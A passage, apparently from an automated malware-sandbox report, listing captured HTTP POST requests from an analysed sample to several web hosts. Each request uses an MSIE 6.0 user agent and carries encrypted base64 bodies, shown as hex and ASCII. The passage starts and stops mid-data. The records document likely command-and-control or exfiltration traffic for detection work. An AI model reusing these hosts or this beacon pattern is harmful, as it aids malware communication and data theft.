aqFkKakxP/595C1JeM7uLMKv2OBHELb07VZ0HGPN1uNjQx1iPaCGHrbg4RXyV27uU+gYa+tnwomkrsBmGIZI6ZHrXCs2d2LOyXlVyBAV12Nq5CAbz4qq550/ABmKzm7MQGaIQiKW20K713Ra3tS2W5C5VAcclD4wZBa9J3rfI19YXdVZ/vYKHIkDJQuFwPirOTg1WheXYqAbGiZNy9rvMP4QFINGDSizTZm8H8UZAwikOCjMM5YvVjHA5VyamHruA5Exl4LFGSEFIdjpk3O4oqMBNZEw4wgA5T9MHlLhZKTtcP4hpWmlbIbz/c097HFQxJJ0vekY5ssaXyiMZZnPwKduKvENGnFYHZTMtPKNCx1FMyfqXGy/nsrivYt6axhyCq+ECxPi/1tRRlFgKViDiV1uMu/qIK4paWCIHOpa2jzKnHqacREobYiXjZoFGMPOChjEIeTsqIXutisIVTqJ+ZszCB4AJ6MVNfqcQ7hyxNKrpf3j68FWpzi3294y8M/0mr9gFrQlb9qhYfUamoI7mSU9GQs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 76 4d 34 74 49 56 37 74 50 76 36 4e 6a 61 6d 56 71 58 56 69 5a 6b 47 6d 75 42 71 65 6f 6f 41 7a 63 6a 4d 37 39 45 69 55 6b 31 79 55 68 55 35 34 45 58 4d 7a 50 51 71 65 35 55 32 56 47 73 2f 34 6b 54 4b 66 4e 35 45 55 59 4b 52 4f 41 54 55 51 61 34 62 47 61 5a 79 71 56 61 6a 54 72 68 37 61 4b 2f 64 37 33 6d 72 74 36 42 4c 66 6b 39 66 50 4f 70 37 58 4b 57 4d 59 78 6d 6b 38 42 56 58 59 2b 54 51 75 30 63 54 45 33 5a 2f 48 4f 77 2f 57 42 46 43 49 5a 6c 74 78 75 71 6c 37 2f 54 47 64 2b 6c 72 75 6d 65 64 61 65 38 57 30 32 57 50 58 73 55 6d 71 65 75 56 57 33 31 4c 4a 38 54 78 33 6b 65 66 68 54 4d 6c 57 4d 44 33 5a 4f 65 66 6f 47 72 49 39 54 6b 35 52 4a 61 64 51 75 64 38 6a 68 4c 52 36 6a 75 34 39 6d 76 68 4f 4c 61 73 59 4b 59 41 71 6e 77 54 33 6c 64 75 52 72 63 4a 45 62 55 4f 33 49 75 59 74 7a 45 44 61 76 75 71 41 4b 2b 6b 37 52 61 68 35 43 6f 30 54 4c 67 6e 4b 35 58 75 61 4d 38 50 6d 46 5a 30 52 2f 51 56 36 4a 52 7a 4a 73 75 69 78 4a 51 54 6f 77 34 62 55 75 4f 39 31 63 65 77 32 77 69 50 41 76 31 4f 72 65 5a 65 6f 54 6c 4d 67 39 2f 4b 64 61 38 71 39 74 61 6f 74 67 73 6d 6d 36 2b 37 2f 74 69 4b 4c 36 4f 73 78 73 36 39 2f 6f 36 49 50 55 4f 76 42 41 4d 62 2b 39 30 76 74 44 50 46 53 74 67 69 35 75 54 6c 35 6f 2b 6b 64 74 76 65 53 4e 76 39 30 37 63 75 6c 58 6a 34 58 76 46 42 4d 6b 2f 62 5a 74 6c 4d 7a 42 2b 58 62 34 6c 4b 4a 30 5a 75 45 68 4e 70 6e 7a 57 49 63 4c 57 30 79 45 48 47 6d 56 71 38 37 41 58 68 35 4e 4d 62 68 61 32 58 2b 65 65 4f 56 58 63 66 35 47 7a 55 6f 45 4b 62 71 69 47 43 57 70 77 6b 6a 6a 45 4e 66 2b 76 4e 72 72 4f 2f 2b 7a 36 4e 59 4f 4b 59 4b 36 68 58 47 7a 55 78 6c 77 6d 46 57 79 38 73 72 34 7a 74 4f 48 70 30 36 43 65 74 42 4e 72 66 30 35 6e 61 67 51 72 62 6f 78 72 6e 31 59 48 45 4e 4f 7a 51 3d Data Ascii: vM4tIV7tPv6NjamVqXViZkGmuBqeooAzcjM79EiUk1yUhU54EXMzPQqe5U2VGs/4kTKfN5EUYKROATUQa4bGaZyqVajTrh7aK/d73mrt6BLfk9fPOp7XKWMYxmk8BVXY+TQu0cTE3Z/HOw/WBFCIZltxuql7/TGd+lrumedae8W02WPXsUmqeuVW31LJ8Tx3kefhTMlWMD3ZOefoGrI9Tk5RJadQud8jhLR6ju49mvhOLasYKYAqnwT3lduRrcJEbUO3IuYtzEDavuqAK+k7Rah5Co0TLgnK5XuaM8PmFZ0R/QV6JRzJsuixJQTow4bUuO91cew2wiPAv1OreZeoTlMg9/Kda8q9taotgsmm6+7/tiKL6Osxs69/o6IPUOvBAMb+90vtDPFStgi5uTl5o+kdtveSNv907culXj4XvFBMk/bZtlMzB+Xb4lKJ0ZuEhNpnzWIcLW0yEHGmVq87AXh5NMbha2X+eeOVXcf5GzUoEKbqiGCWpwkjjENf+vNrrO/+z6NYOKYK6hXGzUxlwmFWy8sr4ztOHp06CetBNrf05nagQrboxrn1YHENOzQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 46 4a 2b 51 4b 6d 51 37 50 2f 35 52 4c 6b 63 61 2f 38 38 53 4a 44 64 4d 52 74 49 63 47 48 43 51 32 4a 61 6c 55 57 36 46 46 78 30 58 6f 2b 51 37 48 47 61 53 43 64 65 4f 73 58 6f 55 50 41 55 41 61 53 6d 37 33 41 34 46 71 68 78 45 36 52 6d 73 68 59 71 31 76 76 70 4a 54 33 6b 33 50 35 57 52 57 35 6e 38 70 42 2f 36 70 2f 7a 64 6a 6c 33 6c 32 52 50 52 4d 41 4b 54 59 64 58 55 73 78 67 70 33 44 47 6e 49 79 38 4f 74 4c 6d 36 57 46 65 51 45 7a 64 49 7a 6f 62 53 6d 52 72 4f 53 2f 38 4c 6b 54 47 64 54 47 68 4c 6d 76 41 39 35 31 6f 57 6c 6a 69 68 59 63 74 73 41 65 56 4e 38 51 56 71 69 4a 6f 77 57 44 75 6d 7a 51 30 54 7a 43 44 34 44 31 62 48 53 2b 77 4f 56 52 75 2b 69 4d 48 71 50 38 47 62 64 4b 66 65 41 6c 35 51 39 47 7a 2b 4a 54 4e 62 59 43 67 78 43 77 45 37 61 76 49 32 31 44 56 4a 4f 4b 78 42 35 78 6a 73 4b 68 57 33 48 69 6d 57 68 53 79 6e 2f 6a 6b 4d 4d 6a 68 2b 4d 75 4e 4d 43 72 6b 2f 6a 61 62 75 33 6f 53 56 48 64 63 4e 69 73 35 38 69 69 6d 4b 31 6d 42 72 42 2f 52 64 2f 41 4c 35 35 33 79 41 34 6b 4d 36 31 51 35 61 6d 6e 7a 46 4f 6b 38 53 62 63 56 59 45 6e 64 79 4e 64 30 59 6d 6c 62 71 65 6b 61 73 68 44 38 6e 57 76 73 45 48 6d 42 55 7a 2f 77 7a 44 7a 37 71 77 36 61 71 31 31 37 4c 42 69 63 44 56 6c 38 51 55 30 4c 4c 69 31 4e 31 41 49 2b 75 70 36 46 49 68 2f 4b 6a 30 2f 35 57 49 76 31 55 2b 75 4a 32 72 5a 63 63 59 50 59 41 49 34 57 6b 79 57 6b 4b 4c 43 71 70 36 77 42 74 6d 77 74 61 69 33 6a 39 66 6b 36 50 46 2f 4b 30 47 37 42 2f 7a 77 45 53 42 69 35 55 52 6f 64 4c 34 44 46 59 6d 6d 78 76 50 69 6d 4f 47 47 47 77 4a 61 36 32 79 4f 32 2b 4a 73 39 76 56 2f 4e 66 75 75 57 78 6a 62 53 6c 7a 47 36 55 6f 75 4b 31 35 54 6a 6a 4f 4e 63 45 73 6b 64 55 4e 62 7a 66 57 6f 2b 4e 31 41 34 46 36 46 6b 6a Data Ascii: FJ+QKmQ7P/5RLkca/88SJDdMRtIcGHCQ2JalUW6FFx0Xo+Q7HGaSCdeOsXoUPAUAaSm73A4FqhxE6RmshYq1vvpJT3k3P5WRW5n8pB/6p/zdjl3l2RPRMAKTYdXUsxgp3DGnIy8OtLm6WFeQEzdIzobSmRrOS/8LkTGdTGhLmvA951oWljihYctsAeVN8QVqiJowWDumzQ0TzCD4D1bHS+wOVRu+iMHqP8GbdKfeAl5Q9Gz+JTNbYCgxCwE7avI21DVJOKxB5xjsKhW3HimWhSyn/jkMMjh+MuNMCrk/jabu3oSVHdcNis58iimK1mBrB/Rd/AL553yA4kM61Q5amnzFOk8SbcVYEndyNd0YmlbqekashD8nWvsEHmBUz/wzDz7qw6aq117LBicDVl8QU0LLi1N1AI+up6FIh/Kj0/5WIv1U+uJ2rZccYPYAI4WkyWkKLCqp6wBtmwtai3j9fk6PF/K0G7B/zwESBi5URodL4DFYmmxvPimOGGGwJa62yO2+Js9vV/NfuuWxjbSlzG6UouK15TjjONcEskdUNbzfWo+N1A4F6Fkj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 69 58 69 78 58 47 41 73 53 66 36 4c 32 51 41 64 73 33 51 30 6f 35 50 32 6b 4d 62 49 34 6e 2f 31 6c 4c 48 57 45 6e 54 52 70 44 39 6a 31 44 39 45 4e 44 65 38 4d 5a 2b 75 55 32 57 56 46 73 6a 37 78 35 44 66 53 48 69 4d 5a 77 64 62 4a 56 61 6f 32 77 41 48 59 2b 4d 6e 4c 48 52 50 65 64 4d 47 4e 7a 43 55 49 4c 51 61 62 72 49 54 68 72 76 56 51 57 39 4a 6e 6d 64 72 72 37 75 47 76 42 30 67 6d 6f 4b 57 77 61 57 4e 48 4b 77 42 41 75 64 34 6a 32 74 72 64 5a 59 75 6a 64 30 4d 34 73 50 41 6c 48 64 2f 30 47 69 50 6f 6c 63 6b 52 6e 67 79 70 52 6d 64 64 59 74 56 64 39 75 59 4a 73 6b 37 7a 6b 74 42 65 6a 49 61 6b 75 62 4e 42 48 45 67 55 31 53 71 6d 58 45 69 6e 6a 4b 51 64 2f 4e 79 6c 75 4f 66 56 62 65 42 51 65 6f 62 56 37 59 31 47 7a 4e 6e 54 4c 4a 4e 74 33 41 30 6c 79 58 49 6b 35 4d 69 78 6c 57 65 30 39 6b 4f 52 33 49 6f 58 45 58 62 4c 67 44 54 54 50 43 32 32 4e 7a 4d 2b 35 6a 43 4a 54 4b 79 6a 61 72 5a 4f 6a 69 31 67 76 56 61 34 4c 46 6e 55 6c 59 75 43 6e 66 56 37 76 37 43 51 4d 2b 47 59 30 73 47 4e 78 6f 2b 57 67 36 4c 52 54 37 38 6d 33 53 72 4f 4f 53 7a 63 4f 39 6e 37 6d 52 35 4f 72 67 79 73 41 43 56 78 63 6a 79 6b 61 37 54 51 53 74 53 59 4c 77 67 69 38 71 2f 73 58 55 76 4f 50 34 62 38 2b 65 57 30 77 69 69 65 61 66 4a 74 4d 59 31 4d 50 6c 2b 34 48 32 54 44 7a 42 66 70 68 49 32 76 35 45 38 30 72 4f 2b 5a 78 53 64 35 48 54 45 43 4d 2f 50 2b 52 70 53 71 4c 56 4a 74 67 36 51 36 34 57 30 72 55 39 79 6a 65 30 47 6b 51 62 71 5a 48 43 78 32 63 37 43 5a 38 56 51 6b 4c 35 78 58 67 4e 6c 6e 6f 51 5a 6e 58 4b 5a 46 4e 35 65 71 6b 4f 57 44 36 6b 65 77 47 6e 41 72 59 49 33 63 79 57 78 63 2f 31 76 Data Ascii: iXixXGAsSf6L2QAds3Q0o5P2kMbI4n/1lLHWEnTRpD9j1D9ENDe8MZ+uU2WVFsj7x5DfSHiMZwdbJVao2wAHY+MnLHRPedMGNzCUILQabrIThrvVQW9Jnmdrr7uGvB0gmoKWwaWNHKwBAud4j2trdZYujd0M4sPAlHd/0GiPolckRngypRmddYtVd9uYJsk7zktBejIakubNBHEgU1SqmXEinjKQd/NyluOfVbeBQeobV7Y1GzNnTLJNt3A0lyXIk5MixlWe09kOR3IoXEXbLgDTTPC22NzM+5jCJTKyjarZOji1gvVa4LFnUlYuCnfV7v7CQM+GY0sGNxo+Wg6LRT78m3SrOOSzcO9n7mR5OrgysACVxcjyka7TQStSYLwgi8q/sXUvOP4b8+eW0wiieafJtMY1MPl+4H2TDzBfphI2v5E80rO+ZxSd5HTECM/P+RpSqLVJtg6Q64W0rU9yje0GkQbqZHCx2c7CZ8VQkL5xXgNlnoQZnXKZFN5eqkOWD6kewGnArYI3cyWxc/1v
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 6f 45 77 4f 4b 49 6b 6d 50 2f 35 67 54 59 77 38 32 48 35 66 45 71 4c 58 30 59 32 6e 31 69 44 6f 7a 57 46 45 73 50 39 2f 45 31 6c 63 72 43 61 73 67 6a 50 38 4e 50 5a 45 71 4b 41 58 75 67 63 6c 2f 53 6c 56 62 56 52 74 55 4c 47 54 4a 66 64 77 46 53 2f 54 4c 77 54 2f 5a 33 7a 6d 66 52 7a 37 44 47 66 42 72 69 48 4b 71 74 50 59 41 57 69 4e 49 79 70 54 7a 56 79 69 41 42 47 65 77 71 62 53 6b 2f 58 35 43 4f 50 6e 63 41 66 43 4a 43 71 6c 71 49 53 48 2f 45 33 72 51 38 4c 4e 51 79 6f 44 50 50 72 4e 38 4f 54 74 4c 33 42 4c 41 53 65 70 51 63 36 45 68 4f 43 45 59 6c 56 4e 54 6b 35 44 79 6c 44 73 56 74 77 63 63 35 6f 37 47 49 67 77 6a 6c 75 30 74 6c 51 65 30 6c 77 61 76 33 61 47 42 38 70 65 4d 68 41 47 78 45 42 76 52 62 59 31 55 36 54 6a 46 2b 32 77 57 6c 50 39 53 68 4b 76 41 52 62 49 68 5a 5a 62 72 7a 64 30 51 4c 70 30 4a 4c 68 6f 52 4d 6e 53 48 65 6e 58 62 34 76 72 67 4e 38 57 6e 39 43 2b 78 41 2f 42 36 6e 4e 41 78 52 49 66 54 53 78 4a 7a 30 47 62 2f 4c 70 55 68 64 42 38 52 36 53 6d 42 71 37 42 5a 48 50 50 46 33 42 55 69 38 2b 57 63 30 4d 54 67 70 67 43 66 50 4e 52 49 46 61 59 4b 6c 55 2b 52 58 36 46 37 58 48 4f 56 69 63 6e 65 62 72 45 58 51 6c 35 30 46 7a 47 6e 2f 77 31 63 64 37 6b 43 54 79 71 37 69 42 34 50 73 78 65 6e 41 45 59 49 41 31 4e 74 4e 67 2b 5a 43 70 53 47 75 45 53 4d 4f 41 69 77 33 68 44 46 69 6e 39 30 33 63 4b 6a 71 48 45 32 72 37 6b 72 65 45 48 64 45 32 7a 38 39 71 54 70 4c 38 44 56 30 56 38 62 70 58 54 62 62 75 64 6c 4f 79 2f 41 62 58 47 54 70 73 79 6d 35 45 74 47 75 67 35 64 57 39 55 4a 34 37 6f 5a 4a 46 54 30 65 47 61 61 4d 54 45 47 69 43 39 77 4e 4e 41 6a 68 74 75 2f 42 35 6b 6e 63 67 77 78 33 32 36 70 78 44 72 57 55 46 73 65 41 6d 61 7a 64 56 34 51 46 58 6f 50 61 74 64 35 66 6e 34 4b 76 49 51 73 6a 70 31 7a 2b 64 50 32 6a 6b 43 Data Ascii: oEwOKIkmP/5gTYw82H5fEqLX0Y2n1iDozWFEsP9/E1lcrCasgjP8NPZEqKAXugcl/SlVbVRtULGTJfdwFS/TLwT/Z3zmfRz7DGfBriHKqtPYAWiNIypTzVyiABGewqbSk/X5COPncAfCJCqlqISH/E3rQ8LNQyoDPPrN8OTtL3BLASepQc6EhOCEYlVNTk5DylDsVtwcc5o7GIgwjlu0tlQe0lwav3aGB8peMhAGxEBvRbY1U6TjF+2wWlP9ShKvARbIhZZbrzd0QLp0JLhoRMnSHenXb4vrgN8Wn9C+xA/B6nNAxRIfTSxJz0Gb/LpUhdB8R6SmBq7BZHPPF3BUi8+Wc0MTgpgCfPNRIFaYKlU+RX6F7XHOVicnebrEXQl50FzGn/w1cd7kCTyq7iB4PsxenAEYIA1NtNg+ZCpSGuESMOAiw3hDFin903cKjqHE2r7kreEHdE2z89qTpL8DV0V8bpXTbbudlOy/AbXGTpsym5EtGug5dW9UJ47oZJFT0eGaaMTEGiC9wNNAjhtu/B5kncgwx326pxDrWUFseAmazdV4QFXoPatd5fn4KvIQsjp1z+dP2jkC
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 51 56 53 63 36 31 38 2f 4a 50 36 71 47 4a 4f 30 76 67 58 4e 78 65 67 67 7a 48 6b 31 35 33 59 71 41 31 57 57 6e 59 63 72 61 31 63 63 33 76 2b 42 36 7a 41 6f 42 63 69 4d 4d 65 4a 30 6b 69 56 59 34 47 58 5a 6c 68 31 4b 68 4f 51 45 61 53 49 69 41 2b 66 77 4e 4b 6d 6a 47 59 39 50 55 71 57 30 72 49 4e 6b 51 79 59 48 67 6e 64 66 71 44 56 48 6d 37 45 4c 4f 73 7a 74 74 2f 36 34 34 6e 43 4d 7a 4d 50 30 55 38 4a 4c 55 7a 6c 76 36 54 72 30 38 31 46 35 37 54 77 35 54 7a 47 55 74 37 48 52 6c 73 46 34 4f 6b 36 63 4a 6b 42 58 71 64 49 69 6f 51 2b 71 41 62 63 76 2b 74 6d 42 71 49 61 4d 66 52 5a 70 36 48 67 36 31 37 37 2b 4c 41 4c 75 2b 6a 73 6a 6a 4b 52 39 37 4b 42 44 4a 4e 50 70 61 30 64 54 54 6e 51 46 31 56 54 49 37 44 35 6e 47 67 45 51 59 53 7a 2b 31 4b 30 62 46 2f 4f 30 56 68 75 56 68 2b 76 59 4b 56 4f 4e 6c 4d 45 73 44 55 64 54 71 36 5a 65 75 65 6a 4f 34 34 58 51 42 61 54 52 34 71 70 70 5a 73 50 70 77 48 4a 66 43 79 56 43 4b 71 43 45 55 61 7a 68 65 46 35 4a 4a 74 43 52 41 48 4f 4f 68 51 2b 6d 30 58 38 55 38 55 43 56 68 77 67 47 75 53 2f 49 77 67 47 30 42 43 34 4b 6c 4a 64 6d 70 39 64 4b 38 61 62 79 47 31 63 6d 6d 6f 65 45 31 6d 49 33 66 70 78 56 69 6c 39 7a 72 57 33 6d 35 72 6d 43 41 41 51 53 4b 4a 62 73 5a 46 64 4f 54 69 62 76 67 6a 71 34 6a 35 79 71 30 35 52 55 50 35 69 7a 63 34 33 73 36 75 53 52 32 53 33 48 6d 54 68 35 47 45 7a 6a 76 6f 67 6a 4f 73 51 43 4e 73 50 49 31 4b 49 4d 72 56 4c 59 53 4e 75 65 50 37 64 6d 6d 38 45 4d 73 42 51 69 38 75 33 4e 63 55 2b 51 79 6e 4d 74 41 4b 62 62 53 61 4f 6f 57 61 4e 71 70 4b 6c 74 62 48 5a 57 68 44 49 54 57 62 43 68 61 51 55 55 4e 4a 4f 70 6e 32 52 33 4a 76 6c 67 41 34 6c 44 37 57 50 6b 57 56 61 4d 69 7a 37 52 5a 59 34 42 61 6d 70 52 33 76 31 64 4b 79 53 78 64 70 7a 67 48 47 47 34 65 49 38 4c 44 37 77 38 6f 37 72 30 66 2f 73 3d Data Ascii: QVSc618/JP6qGJO0vgXNxeggzHk153YqA1WWnYcra1cc3v+B6zAoBciMMeJ0kiVY4GXZlh1KhOQEaSIiA+fwNKmjGY9PUqW0rINkQyYHgndfqDVHm7ELOsztt/644nCMzMP0U8JLUzlv6Tr081F57Tw5TzGUt7HRlsF4Ok6cJkBXqdIioQ+qAbcv+tmBqIaMfRZp6Hg6177+LALu+jsjjKR97KBDJNPpa0dTTnQF1VTI7D5nGgEQYSz+1K0bF/O0VhuVh+vYKVONlMEsDUdTq6ZeuejO44XQBaTR4qppZsPpwHJfCyVCKqCEUazheF5JJtCRAHOOhQ+m0X8U8UCVhwgGuS/IwgG0BC4KlJdmp9dK8abyG1cmmoeE1mI3fpxVil9zrW3m5rmCAAQSKJbsZFdOTibvgjq4j5yq05RUP5izc43s6uSR2S3HmTh5GEzjvogjOsQCNsPI1KIMrVLYSNueP7dmm8EMsBQi8u3NcU+QynMtAKbbSaOoWaNqpKltbHZWhDITWbChaQUUNJOpn2R3JvlgA4lD7WPkWVaMiz7RZY4BampR3v1dKySxdpzgHGG4eI8LD7w8o7r0f/s=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 76 4d 34 74 49 56 37 74 50 76 36 4e 6a 61 6d 56 71 58 56 69 5a 6b 47 6d 75 42 71 65 6f 6f 41 7a 63 6a 4d 37 39 45 69 55 6b 31 79 55 68 55 35 34 45 58 4d 7a 50 51 71 65 35 55 32 56 47 73 2f 34 6b 54 4b 66 4e 35 45 55 59 4b 52 4f 41 54 55 51 61 34 62 47 61 5a 79 71 56 61 6a 54 72 68 37 61 4b 2f 64 37 33 6d 72 74 36 42 4c 66 6b 39 66 50 4f 70 37 58 4b 57 4d 59 78 6d 6b 38 42 56 58 59 2b 54 51 75 30 63 54 45 33 5a 2f 48 4f 77 2f 57 42 46 43 49 5a 6c 74 78 75 71 6c 37 2f 54 47 64 2b 6c 72 75 6d 65 64 61 65 38 57 30 32 57 50 58 73 55 6d 71 65 75 56 57 33 31 4c 4a 38 54 78 33 6b 65 66 68 54 4d 6c 57 4d 44 33 5a 4f 65 66 6f 47 72 49 39 54 6b 35 52 4a 61 64 51 75 64 38 6a 68 4c 52 36 6a 75 34 39 6d 76 68 4f 4c 61 73 59 4b 59 41 71 6e 77 54 33 6c 64 75 52 72 63 4a 45 62 55 4f 33 49 75 59 74 7a 45 44 61 76 75 71 41 4b 2b 6b 37 52 61 68 35 43 6f 30 54 4c 67 6e 4b 35 58 75 61 4d 38 50 6d 46 5a 30 52 2f 51 56 36 4a 52 7a 4a 73 75 69 78 4a 51 54 6f 77 34 62 55 75 4f 39 31 63 65 77 32 77 69 50 41 76 31 4f 72 65 5a 65 6f 54 6c 4d 67 39 2f 4b 64 61 38 71 39 74 61 6f 74 67 73 6d 6d 36 2b 37 2f 74 69 4b 4c 36 4f 73 78 73 36 39 2f 6f 36 49 50 55 4f 76 42 41 4d 62 2b 39 30 76 74 44 50 46 53 74 67 69 35 75 54 6c 35 6f 2b 6b 64 74 76 65 53 4e 76 39 30 37 63 75 6c 58 6a 34 58 76 46 42 4d 6b 2f 62 5a 74 6c 4d 7a 42 2b 58 62 34 6c 4b 4a 30 5a 75 45 68 4e 70 6e 7a 57 49 63 4c 57 30 79 45 48 47 6d 56 71 38 37 41 58 68 35 4e 4d 62 68 61 32 58 2b 65 65 4f 56 58 63 66 35 47 7a 55 6f 45 4b 62 71 69 47 43 57 70 77 6b 6a 6a 45 4e 66 2b 76 4e 72 72 4f 2f 2b 7a 36 4e 59 4f 4b 59 4b 36 68 58 47 7a 55 78 6c 77 6d 46 57 79 38 73 72 34 7a 74 4f 48 70 30 36 43 65 74 42 4e 72 66 30 35 6e 61 67 51 72 62 6f 78 72 6e 31 59 48 45 4e 4f 7a 51 3d Data Ascii: vM4tIV7tPv6NjamVqXViZkGmuBqeooAzcjM79EiUk1yUhU54EXMzPQqe5U2VGs/4kTKfN5EUYKROATUQa4bGaZyqVajTrh7aK/d73mrt6BLfk9fPOp7XKWMYxmk8BVXY+TQu0cTE3Z/HOw/WBFCIZltxuql7/TGd+lrumedae8W02WPXsUmqeuVW31LJ8Tx3kefhTMlWMD3ZOefoGrI9Tk5RJadQud8jhLR6ju49mvhOLasYKYAqnwT3lduRrcJEbUO3IuYtzEDavuqAK+k7Rah5Co0TLgnK5XuaM8PmFZ0R/QV6JRzJsuixJQTow4bUuO91cew2wiPAv1OreZeoTlMg9/Kda8q9taotgsmm6+7/tiKL6Osxs69/o6IPUOvBAMb+90vtDPFStgi5uTl5o+kdtveSNv907culXj4XvFBMk/bZtlMzB+Xb4lKJ0ZuEhNpnzWIcLW0yEHGmVq87AXh5NMbha2X+eeOVXcf5GzUoEKbqiGCWpwkjjENf+vNrrO/+z6NYOKYK6hXGzUxlwmFWy8sr4ztOHp06CetBNrf05nagQrboxrn1YHENOzQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 48 7a 63 35 44 48 4a 4f 4a 66 34 58 63 41 39 73 70 56 75 33 71 6e 58 6f 45 64 31 43 65 78 5a 2f 78 6a 76 46 58 62 62 51 31 65 31 47 52 68 59 41 7a 6b 4c 5a 42 6f 56 7a 43 6f 34 6d 55 6e 41 30 45 6f 38 31 6a 54 72 4d 31 58 72 49 70 65 6e 39 72 59 76 43 66 4e 33 4a 49 67 72 4e 67 55 48 45 73 33 4f 73 31 6d 6f 34 57 33 53 4e 48 52 35 30 4a 66 43 4b 33 57 67 7a 59 71 36 50 30 76 62 58 35 54 52 75 41 67 66 4d 46 4b 79 2f 52 41 31 55 62 6b 49 6b 63 4a 7a 35 6a 32 33 4c 67 5a 56 50 78 6a 6b 47 77 54 46 4d 72 44 34 67 49 42 4c 68 6d 65 61 50 2f 6e 71 62 6f 42 4d 55 4b 35 45 4a 74 6d 36 72 6e 67 78 63 35 70 57 2f 76 7a 44 4c 4c 41 62 55 2b 71 54 68 43 6c 75 74 77 32 42 6b 4f 36 4c 33 77 72 58 6e 42 54 66 77 72 6f 39 69 44 74 2b 58 55 4c 34 78 6f 51 65 67 71 32 6f 75 41 59 7a 6b 78 54 75 4e 36 50 45 72 41 48 6f 54 41 57 6d 69 73 63 6b 69 34 4a 30 48 47 79 53 69 74 34 58 43 42 75 36 65 31 48 6e 6f 4d 32 68 6e 76 41 34 37 65 62 39 35 50 43 51 4d 4a 57 56 34 52 34 78 79 71 59 66 4f 47 53 6e 52 76 39 4c 4b 50 38 41 4a 43 42 75 4a 59 76 54 49 68 38 31 35 56 2b 32 2f 54 51 48 63 59 35 54 44 4d 79 47 75 42 46 65 63 68 75 2b 76 7a 73 54 77 30 4a 6e 70 4e 77 68 75 79 44 4a 51 4f 62 76 65 77 64 5a 53 36 51 6a 64 77 63 35 72 37 70 38 6f 74 52 44 57 79 2f 76 38 41 64 63 68 6a 51 4b 72 6b 63 4c 75 62 73 72 44 6f 69 62 41 44 30 53 70 6f 48 54 51 41 44 56 56 39 72 63 53 42 71 65 53 58 79 69 51 31 70 48 63 47 54 38 45 6b 30 62 62 56 52 48 2b 35 4d 7a 67 5a 55 68 62 77 62 67 49 32 79 77 5a 55 6b 74 50 62 38 45 6e 63 68 32 49 59 30 42 39 74 4d 4f 42 56 59 7a 33 61 4d 72 57 66 5a 48 48 55 61 44 4f 72 37 36 34 44 76 50 58 61 36 78 53 2f 6e 4e 5a 63 58 68 33 41 4c 63 38 68 57 34 76 58 7a 41 59 5a 30 47 75 79 6a 69 57 6a 48 34 48 54 57 78 70 2f 41 3d 3d Data Ascii: Hzc5DHJOJf4XcA9spVu3qnXoEd1CexZ/xjvFXbbQ1e1GRhYAzkLZBoVzCo4mUnA0Eo81jTrM1XrIpen9rYvCfN3JIgrNgUHEs3Os1mo4W3SNHR50JfCK3WgzYq6P0vbX5TRuAgfMFKy/RA1UbkIkcJz5j23LgZVPxjkGwTFMrD4gIBLhmeaP/nqboBMUK5EJtm6rngxc5pW/vzDLLAbU+qThClutw2BkO6L3wrXnBTfwro9iDt+XUL4xoQegq2ouAYzkxTuN6PErAHoTAWmiscki4J0HGySit4XCBu6e1HnoM2hnvA47eb95PCQMJWV4R4xyqYfOGSnRv9LKP8AJCBuJYvTIh815V+2/TQHcY5TDMyGuBFechu+vzsTw0JnpNwhuyDJQObvewdZS6Qjdwc5r7p8otRDWy/v8AdchjQKrkcLubsrDoibAD0SpoHTQADVV9rcSBqeSXyiQ1pHcGT8Ek0bbVRH+5MzgZUhbwbgI2ywZUktPb8Ench2IY0B9tMOBVYz3aMrWfZHHUaDOr764DvPXa6xS/nNZcXh3ALc8hW4vXzAYZ0GuyjiWjH4HTWxp/A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 61 71 46 6b 4b 61 6b 78 50 2f 35 39 35 43 31 4a 65 4d 37 75 4c 4d 4b 76 32 4f 42 48 45 4c 62 30 37 56 5a 30 48 47 50 4e 31 75 4e 6a 51 78 31 69 50 61 43 47 48 72 62 67 34 52 58 79 56 32 37 75 55 2b 67 59 61 2b 74 6e 77 6f 6d 6b 72 73 42 6d 47 49 5a 49 36 5a 48 72 58 43 73 32 64 32 4c 4f 79 58 6c 56 79 42 41 56 31 32 4e 71 35 43 41 62 7a 34 71 71 35 35 30 2f 41 42 6d 4b 7a 6d 37 4d 51 47 61 49 51 69 4b 57 32 30 4b 37 31 33 52 61 33 74 53 32 57 35 43 35 56 41 63 63 6c 44 34 77 5a 42 61 39 4a 33 72 66 49 31 39 59 58 64 56 5a 2f 76 59 4b 48 49 6b 44 4a 51 75 46 77 50 69 72 4f 